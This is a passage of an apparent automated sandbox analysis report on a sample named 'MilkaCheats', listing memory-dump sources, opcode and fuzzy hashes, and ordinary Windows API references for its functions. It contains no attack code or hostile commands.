                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: 04a000fc70ec7f43c0a48e8d1629af448c8a7cac089f5fcd09365eae28d3b36c
                                                                                              • Instruction ID: 7ead9330d6fb5ec56e4a6d3c759753f9001993e926bbd0a90d29f76798125fe5
                                                                                              • Opcode Fuzzy Hash: 04a000fc70ec7f43c0a48e8d1629af448c8a7cac089f5fcd09365eae28d3b36c
                                                                                              • Instruction Fuzzy Hash: E4B118312107099FD764CF28C886B657BE0FF45365F258669E89ACF3A1C335E992CB50
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000C7122
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              • Opcode ID: 66aae7a4e08a64924d830ea6fb66003aa4519b8716cda559b830e14b342d4b28
                                                                                              • Instruction ID: 7a2511586779ab2f177e035dfc800e4b97caa53f08644d4a0ae91fc385ddd6e8
                                                                                              • Opcode Fuzzy Hash: 66aae7a4e08a64924d830ea6fb66003aa4519b8716cda559b830e14b342d4b28
                                                                                              • Instruction Fuzzy Hash: 3CA19D759156059FDB18CF58D882BADBBF6FB49320F29812ED819E7A60C3B499C0CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ' SZ
                                                                                              • API String ID: 0-1053079558
                                                                                              • Opcode ID: 1a562f3a46396350bca214a8895319665ebac12cd9b8ea38f6bb1bd7357b19e8
                                                                                              • Instruction ID: 589e5e406e04f8c79e388b5dcdbbd52b3defe9622ae69a21ee86274ad62b5415
                                                                                              • Opcode Fuzzy Hash: 1a562f3a46396350bca214a8895319665ebac12cd9b8ea38f6bb1bd7357b19e8
                                                                                              • Instruction Fuzzy Hash: 64E128302047828FD7298B39C4907A2BBE2AFA7314F1985ACD4D64F7D6C779A846CB51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Y!
                                                                                              • API String ID: 0-2222236823
                                                                                              • Opcode ID: 44f56a3e0c808689ffa54ba9031cba8359a2877d00e67e35a48a7f930c708c93
                                                                                              • Instruction ID: 1a7fe65fc6593daaef19a1f518d9a62d054dcd1715f6189c0d7d8a38ee5f388f
                                                                                              • Opcode Fuzzy Hash: 44f56a3e0c808689ffa54ba9031cba8359a2877d00e67e35a48a7f930c708c93
                                                                                              • Instruction Fuzzy Hash: E2C13672A046108BD718DB24D8526BBB7E2EF95724F09853CF8C58B392E738DD85C792
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ~^Pf
                                                                                              • API String ID: 0-3538719280
                                                                                              • Opcode ID: fcf5e9002738e74fb6e6bc7ba6a727c98c5c51d942af80ad7f26d954ff4c7fc5
                                                                                              • Instruction ID: dfcb1f63a02fe59d82ad7d1d4aa948f4a5c571958650984f8260fb3a4f73eaf5
                                                                                              • Opcode Fuzzy Hash: fcf5e9002738e74fb6e6bc7ba6a727c98c5c51d942af80ad7f26d954ff4c7fc5
                                                                                              • Instruction Fuzzy Hash: B5D1BD756047418FD329CF29C450762FBE2AF96314F28C6ADD4EA8B7A2C739D846CB50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "
                                                                                              • API String ID: 0-123907689
                                                                                              • Opcode ID: 07a68b65afc1f8c2f0352e68ae02b44972fd835b148217e58b0b56862b6ef539
                                                                                              • Instruction ID: 111e699ce8b6fc32902bd0270e4b735fc404d667dff2a09b9ecfc8c4d8b44380
                                                                                              • Opcode Fuzzy Hash: 07a68b65afc1f8c2f0352e68ae02b44972fd835b148217e58b0b56862b6ef539
                                                                                              • Instruction Fuzzy Hash: 53D118B2A083105FD718CE24D481BABBBE6AF95354F19853DE899C7381E734DD84C792
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: _a1c
                                                                                              • API String ID: 0-3923334831
                                                                                              • Opcode ID: 69ae0ed3bd97d48e93cdc9e50c7d5bd1abc65dadb251b0cc80b723393a68fc2b
                                                                                              • Instruction ID: df7a00e9c5cc912ed9a65ee7255a29503c806ca2406f3798c95aa6eaca894d6e
                                                                                              • Opcode Fuzzy Hash: 69ae0ed3bd97d48e93cdc9e50c7d5bd1abc65dadb251b0cc80b723393a68fc2b
                                                                                              • Instruction Fuzzy Hash: E8C1F1B59093118BD3158F24C8813ABBBE2EFD5754F188A2CE4C55B3A5D774C982CB86
                                                                                              APIs
                                                                                              • _Deallocate.LIBCONCRT ref: 000C4D85
                                                                                                • Part of subcall function 000C1575: __EH_prolog3_catch.LIBCMT ref: 000C157C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeallocateH_prolog3_catch
                                                                                              • String ID:
                                                                                              • API String ID: 20358830-0
                                                                                              • Opcode ID: 9f2e1524070fdeb75737c359b4b60c04fb161b5dff844a0bef9cbc2d86fd044f
                                                                                              • Instruction ID: 564d7e83820b381f19fafe280a8418dc2bc70a1ff92c020f391069832c27b46e
                                                                                              • Opcode Fuzzy Hash: 9f2e1524070fdeb75737c359b4b60c04fb161b5dff844a0bef9cbc2d86fd044f
                                                                                              • Instruction Fuzzy Hash: 984167719193529FC394DF68888095FFBE8FB89710F440A2EF984DB351E330DA018B92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0
                                                                                              • API String ID: 0-4108050209
                                                                                              • Opcode ID: 13c28ddcc3cd2f3c9792e811e29e91eefb9bcede04e74da7d9b8ef8bc9586b84
                                                                                              • Instruction ID: e69d287121b4fc1f126c198d78c31cfa913117a1200645cf33ecf303ab87440d
                                                                                              • Opcode Fuzzy Hash: 13c28ddcc3cd2f3c9792e811e29e91eefb9bcede04e74da7d9b8ef8bc9586b84
                                                                                              • Instruction Fuzzy Hash: 35C19D70A046868FCB74CF68C484FBEBBE2AB45314F24462DE4579B2A2C731AD46CB51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8977
                                                                                              • API String ID: 0-400282742
                                                                                              • Opcode ID: 260720bded5ebe0c085c50f3c04ff5b3840a6d228c069c1f1f0eb7ee3ad91b64
                                                                                              • Instruction ID: c31f30fe50ff38d853c810fc46fc7f481977bef2f616ae72c549d6d3a4f5b97a
                                                                                              • Opcode Fuzzy Hash: 260720bded5ebe0c085c50f3c04ff5b3840a6d228c069c1f1f0eb7ee3ad91b64
                                                                                              • Instruction Fuzzy Hash: 2CA14372A043506FE7189E289C417BBB7E5ABC5314F094A2CFE95D7252EB35EC048792
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000DE1FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 3736152602-0
                                                                                              • Opcode ID: 1472c32d7899857d8583fc4b943c0ba56fb88ed1ccfc909f6b4c9718f75a5d5c
                                                                                              • Instruction ID: 7fdc3a38a9e66a424d8a3c530931ad23fca89578b5b013acfd2059bf0a1d656e
                                                                                              • Opcode Fuzzy Hash: 1472c32d7899857d8583fc4b943c0ba56fb88ed1ccfc909f6b4c9718f75a5d5c
                                                                                              • Instruction Fuzzy Hash: 0A219272A14346ABEB28AB24DC42ABA73ECEF45314B14017FF905DB242EB74ED44C760
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0
                                                                                              • API String ID: 0-4108050209
                                                                                              • Opcode ID: 9e03d8749efb084e4d3236a1f2697f77b77e45cd6a4540dc4961ce85ab784436
                                                                                              • Instruction ID: 69f69aa87bd1b981c4e4ea2d204fceec5306f13440ab4d0d5d5546ce8a310d7c
                                                                                              • Opcode Fuzzy Hash: 9e03d8749efb084e4d3236a1f2697f77b77e45cd6a4540dc4961ce85ab784436
                                                                                              • Instruction Fuzzy Hash: 05B1B47090068A8BCBB8CFA4C491FBEB7F5EF41300F14062EE556A7292DB35AD45CB52
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • EnumSystemLocalesW.KERNEL32(000DDF54,00000001,00000000,?,-00000050,?,000DE585,00000000,?,?,?,00000055,?), ref: 000DDEA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2417226690-0
                                                                                              • Opcode ID: 8cd60ba6bf26e550e0934cfea74711bd3bb2b0d8bed279d7b5d12dbdcbee3bca
                                                                                              • Instruction ID: 7996204da9149b7f35899623c148f926392b99acfda1f213a92e7d65dc5aa713
                                                                                              • Opcode Fuzzy Hash: 8cd60ba6bf26e550e0934cfea74711bd3bb2b0d8bed279d7b5d12dbdcbee3bca
                                                                                              • Instruction Fuzzy Hash: 5811C63A2007055FDF18AF39D8915BAB791FB90358B14482FE6478BB40D371A942C750
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,000DE170,00000000,00000000,?), ref: 000DE402
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 3736152602-0
                                                                                              • Opcode ID: d70edbdc045944395db2b8293b31686f01aca8d688aba91c33b2a449d7de83f4
                                                                                              • Instruction ID: 26ecc70f370fe7dc73a1baf57baa952ec19692d060c08be17e72e3685c5e49c6
                                                                                              • Opcode Fuzzy Hash: d70edbdc045944395db2b8293b31686f01aca8d688aba91c33b2a449d7de83f4
                                                                                              • Instruction Fuzzy Hash: F8F0F932A40355ABDB246B64C805BBF7798DB40754F55482AED06A7280DA74FD41C5B0
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • EnumSystemLocalesW.KERNEL32(000DE1A7,00000001,?,?,-00000050,?,000DE549,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 000DDF13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2417226690-0
                                                                                              • Opcode ID: f9996562bba6d22bb8a8f29b840e16ba0971d62164c824dbde37c3b54f9af08b
                                                                                              • Instruction ID: 17476c54ccac888766fcd361014cf2cc210064c04f0fc0ebc9b9f361b4ccaf59
                                                                                              • Opcode Fuzzy Hash: f9996562bba6d22bb8a8f29b840e16ba0971d62164c824dbde37c3b54f9af08b
                                                                                              • Instruction Fuzzy Hash: 0BF0C23A2043045FDB246F359881ABA7BD5EB80768B05443FFA068B781D6B1AC02CA60
                                                                                              APIs
                                                                                                • Part of subcall function 000CF8B0: EnterCriticalSection.KERNEL32(?,?,000D3ED8,?,000ED8D0,00000008,000D409C,?,?,?), ref: 000CF8BF
                                                                                              • EnumSystemLocalesW.KERNEL32(000D54F0,00000001,000ED970,0000000C,000D58C2,00000000), ref: 000D5535
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1272433827-0
                                                                                              • Opcode ID: b508d072588b1794b6801fa593924ba843f17a0cce132e075ec88cd76cbf8606
                                                                                              • Instruction ID: 6460ea78ddbb2c7222c5f2a1042cc0d9684d8bd0f9abf6783870e6d4f2b5aacd
                                                                                              • Opcode Fuzzy Hash: b508d072588b1794b6801fa593924ba843f17a0cce132e075ec88cd76cbf8606
                                                                                              • Instruction Fuzzy Hash: FEF03C76A40204EFDB10DF58E882B9C77F1EB05721F10412BF5159B3A2CAB589808F90
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • EnumSystemLocalesW.KERNEL32(000DDD3C,00000001,?,?,?,000DE5A7,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 000DDE1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2417226690-0
                                                                                              • Opcode ID: d2f5723994bb9203e3605df3684744d887d2b5ee162dd8ed9dd6320e6c64872b
                                                                                              • Instruction ID: a188c1cbefb8376f66704e6e63265d13c22ff3ac0f30768356ae4c4fd7d3848e
